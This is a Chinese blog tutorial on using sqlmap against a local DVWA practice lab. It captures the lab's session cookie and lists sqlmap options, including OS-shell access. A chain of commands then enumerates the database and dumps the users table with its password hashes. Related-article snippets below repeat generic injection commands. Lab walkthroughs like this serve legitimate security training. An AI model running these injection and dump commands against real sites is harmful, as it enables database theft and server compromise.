sqlmap(一)

最新推荐文章于 2025-06-07 15:38:40 发布
最新推荐文章于 2025-06-07 15:38:40 发布
阅读量3.3k 收藏 8
点赞数 1
分类专栏: KaliLinux 文章标签: sqlmap
本文介绍了如何使用Sqlmap这款开源工具来进行SQL注入攻击。通过详细的步骤演示了如何配置环境并利用Sqlmap发现并利用SQL注入漏洞,最终获取数据库中的敏感信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Sqlmap是一款开源的命令行自动SQL注入工具。它能够对多种主流数据库进行扫描支持。

1.启动xampp



2.测试的网站是DVWA,security level设为medium,因为在sqlmap中安全等级设为low,medium,high都是一样的操作步骤。


3.启动Tamper Data(tools->tamper data)


4.测试一下


5.得到了request header

Host=127.0.0.1
User-Agent=Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0
Accept=*/*
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=https://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit
Cookie=security=medium; PHPSESSID=hdunet1u4dhrgmjmmiemas0454

6.在终端用sqlmap

sqlmap的一些用法:

  1. root@kali:~# sqlmap -h
  2. Usage: python sqlmap [options]
  3.  
  4. Options:
  5.   -h, –help            Show basic help message and exit
  6.   -hh                   Show advanced help message and exit
  7.   –version             Show program’s version number and exit
  8.   -v VERBOSE            Verbosity level: 0-6 (default 1)
  9.  
  10.   Target:
  11.     At least one of these options has to be provided to define the
  12.     target(s)
  13.  
  14.     -u URL, –url=URL   Target URL (e.g. ”http://www.site.com/vuln.php?id=1”)
  15.     -g GOOGLEDORK       Process Google dork results as target URLs
  16.  
  17.   Request:
  18.     These options can be used to specify how to connect to the target URL
  19.  
  20.     –data=DATA         Data string to be sent through POST
  21.     –cookie=COOKIE     HTTP Cookie header value
  22.     –random-agent      Use randomly selected HTTP User-Agent header value
  23.     –proxy=PROXY       Use a proxy to connect to the target URL
  24.     –tor               Use Tor anonymity network
  25.     –check-tor         Check to see if Tor is used properly
  26.  
  27.   Injection:
  28.     These options can be used to specify which parameters to test for,
  29.     provide custom injection payloads and optional tampering scripts
  30.  
  31.     -p TESTPARAMETER    Testable parameter(s)
  32.     –dbms=DBMS         Force back-end DBMS to this value
  33.  
  34.   Detection:
  35.     These options can be used to customize the detection phase
  36.  
  37.     –level=LEVEL       Level of tests to perform (1-5, default 1)
  38.     –risk=RISK         Risk of tests to perform (0-3, default 1)
  39.  
  40.   Techniques:
  41.     These options can be used to tweak testing of specific SQL injection
  42.     techniques
  43.  
  44.     –technique=TECH    SQL injection techniques to use (default ”BEUSTQ”)
  45.  
  46.   Enumeration:
  47.     These options can be used to enumerate the back-end database
  48.     management system information, structure and data contained in the
  49.     tables. Moreover you can run your own SQL statements
  50.  
  51.     -a, –all           Retrieve everything
  52.     -b, –banner        Retrieve DBMS banner
  53.     –current-user      Retrieve DBMS current user
  54.     –current-db        Retrieve DBMS current database
  55.     –passwords         Enumerate DBMS users password hashes
  56.     –tables            Enumerate DBMS database tables
  57.     –columns           Enumerate DBMS database table columns
  58.     –schema            Enumerate DBMS schema
  59.     –dump              Dump DBMS database table entries
  60.     –dump-all          Dump all DBMS databases tables entries
  61.     -D DB               DBMS database to enumerate
  62.     -T TBL              DBMS database table(s) to enumerate
  63.     -C COL              DBMS database table column(s) to enumerate
  64.  
  65.   Operating system access:
  66.     These options can be used to access the back-end database management
  67.     system underlying operating system
  68.  
  69.     –os-shell          Prompt for an interactive operating system shell
  70.     –os-pwn            Prompt for an OOB shell, Meterpreter or VNC
  71.  
  72.   General:
  73.     These options can be used to set some general working parameters
  74.  
  75.     –batch             Never ask for user input, use the default behaviour
  76.     –flush-session     Flush session files for current target
  77.  
  78.   Miscellaneous:
  79.     –sqlmap-shell      Prompt for an interactive sqlmap shell
  80.     –wizard            Simple wizard interface for beginner users
  81.  
  82. [!] to see full list of options run with ’-hh’
  83. root@kali:~#

sqlmap -u ‘http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit’ –cookie=’security=medium; PHPSESSID=hdunet1u4dhrgmjmmiemas0454’ –dbs


sqlmap -u ‘http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit’ –cookie=’security=medium; PHPSESSID=hdunet1u4dhrgmjmmiemas0454’ -D dvwa –tables


sqlmap -u ‘http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit’ –cookie=’security=medium; PHPSESSID=hdunet1u4dhrgmjmmiemas0454’ -D dvwa -T users –columns


sqlmap -u ‘http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit’ –cookie=’security=medium; PHPSESSID=hdunet1u4dhrgmjmmiemas0454’ -D dvwa -T users –columns –dump


sqlmap的–dump选项,可以轻易的获得后台数据库的所有用户账户名和口令哈希。

            </div>
Sqlmap使用教程
ygyydwx的博客
03-09 2313
sqlmap也是渗透中常用的个注入工具,其实在注入工具方面,sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是个便捷性问题,sql注入另方面就是手工党了,这个就另当别论了。 今天把我直以来整理的sqlmap笔记发布上来供大家参考。 教程说明 学习sqlmap前,建议了解SQL注入实现原理与基本的手工注入操作,更易于理解sqlmap的使用。 我的另个笔记整理:可能是网上最易懂的SQL手工注入教程【个人笔记精华整理】 针对sqlmap注入过waf,可以参考:sqlmap注入之t
sqlmap使用教程
hmysn的博客
07-27 1万+
sqlmap个自动化的SQL注入工具,主要功能是扫描、发现,并利用给定url的SQL注入漏洞。
【建议码住】纯纯干货,“渗透测试的瑞士军刀” Sqlmap常用手册!
资深程序员,曾自学JAVA,C#,如今从业于网安行业
06-07 571
相对于手工注入,sqlmap的高效注入大大提高了我们渗透效率。联合查询,在可以使用Union的情况下注入(注入效率最高,成本最低)报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回到页面中布尔盲注,即可以根据返回页面判断条件真假的注入延时注入,即不能根据页面返回的内容判断任何信息,要用条件语句查看时间延迟语句是否已经执行(即页面返回时间是否增加)来判断堆叠查询,可以同时执行多条语句时的注入注入小技巧:有回显可以用联合查询,有报错可以用报错注入。
sqlmap教程1
bestlzk的博客
08-22 454
步: sqlmap基于Python,所以首先下载 第二步: 安装Python,将sqlmap解压到Python根目录下; 第三步: 小试牛刀,查看sqlmap版本: python sqlmap/sqlmap.py -h 第四步: 通过SQL注入扫描工具扫描网站,找出怀疑有SQL注入问题的URL; 第五步: 1.基础信息 python sqlmap/sqlmap
SQLMAP使用教程
CH3UHX9
02-07 1112
简介 sqlmap个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。 具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。 支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2,SQLite,Firebird,Sybase和SAP MaxDB等数据库的各种安全
sqlmap次扫出整张数据表
10-09
如果你想要使用SQLMap次性扫描整个数据表,通常需要结合特定的目标数据库结构来进行操作。以下是个基本步骤: 1. **获取数据库元数据**:首先,你需要对目标网站进行SQL注入攻击,通过输入特殊的payload(比如...
sqlmap把梭
最新发布
06-20
SQLMap款强大的自动化 SQL 注入工具,可以用于检测和利用 SQL 注入漏洞。以下是关于如何使用 SQLMap 进行自动化 SQL 注入测试的详细说明: #### 1. 基本命令结构 SQLMap 的基本命令结构如下: ```bash python ...
SQLmap压缩包,SQLmap压缩包
06-07
SQLmap款强大的、自动化的SQL注入工具,主要用于检测和利用SQL注入漏洞,它可以帮助安全研究人员或渗透测试者发现并利用网站数据库的安全弱点。这个压缩包`sqlmapproject-sqlmap-1230e57`很可能包含了SQLmap的源...
sqlmap图形化注入工具
01-21
用户需要将工具的exe程序、dll文件与汉化版的sqlmap同放置在统目录下,并且确保在合法授权的前提下使用该工具。该项目的文件名称"Sqlmap_Gui-main"强调了该工具的主目录或主程序所在,用户在使用前应确保文件...
sqlmap条命令直连服务器(靶机)
weixin_45571987的博客
09-21 866
sqlmap命令--os-shell的使用、寻找注入点成功找到注入点二、在sqlmap使用--os-shell直接登录后台服务器!三、获取falglinux命令获取flag使用蚁剑通过sqlmap的后门连上后台服务器 、寻找注入点 这次的目标是连接该网站的服务器并获取flag 按照咱们注入的流程,先来找找注入点 浏览了下网页发现框框处很可能有页面交互 点击F12 点击网络可以看见页面发送的包 为了更清晰的观察和获取跟多信息 咱们还是打开burp(记得要在浏览器上把SwitchyOmega扩展下载好,
sqlmap简易教程
v_wus的博客
05-12 536
sqlmap简易教程 注入分法不同,种类不同,来个简单的分类: 1.get型:sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=xxx” 2.post型: sqlmap -u “http://xxx.xx.xxx/xx.xxx” –data=”xxxx=xxxx&xxxx=xxx” 3.cookie类注入: sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=xxx” –cookie=”xxx=xxx&xxx=xxx” –level=2
sqlmap 使用教程
热门推荐
weixin_46962006的博客
11-14 2万+
                       sqlmap 使用教程 前言        个人观点,若有误请指教 Options(选项) -h:帮助文档 -‌-version:查看sqlmap版本信息 -v:显示详细信息    ·0:只显示python的错误和些严重性的信息    ·1:显示基本信息(默认)    ·2:显示debug信息    ·3:显示注入过程的payload    ·4:显示http请求包    ·5:显示http响应头    ·6:显示http响应页面 Target(目标
Sqlmap的使用方法
w1304099880的博客
10-26 1529
sqlmap个非常强大的sql注入检测与辅助工具,但是由于没有图形界面,基本上用起来比较麻烦。我们要了解这些语句。如下: 检查注入点: sqlmap-uhttp://ooxx.com.tw/star_photo.php?artist_id=11 爆所有数据库信息: sqlmap-uhttp://ooxx.com.tw/star_photo.php?artist_id=11--...
SQLMap的入门教程
星辰
10-18 891
什么是SQLMap?         sqlmap个自动化的sql注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,还可以检测XSS漏洞,内置了很多绕过的插件,支持的数据库有:MySQL、Oracle、postgreSQL、SQLserver、Access、DB2、SQLite、Firebird、S...
SQLMAP简易使用教程
nzw1134864657的博客
10-07 9437
SQLMap 个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL 注入漏洞,内置了很多绕过插件 1.1 SQLMap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用union的情况下的注入。 5、堆查询注入,可以同
sqlmap使用教程(包含POST型注入方式)
weixin_73904941的博客
10-25 9603
检测注入点以及可注入类型 sqlmap -u "网址" --batch -–batch(不再询问,默认执行) 查看所有数据库 --dbs sqlmap -u "网址" --batch --dbs 查看当前使用的数据库 --current-db sqlmap -u "网址" --batch --current-db 查看表名 sqlmap -u "网址" -D security --tables --batch -D 指定数据库 --tables 列举所有表名 ....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值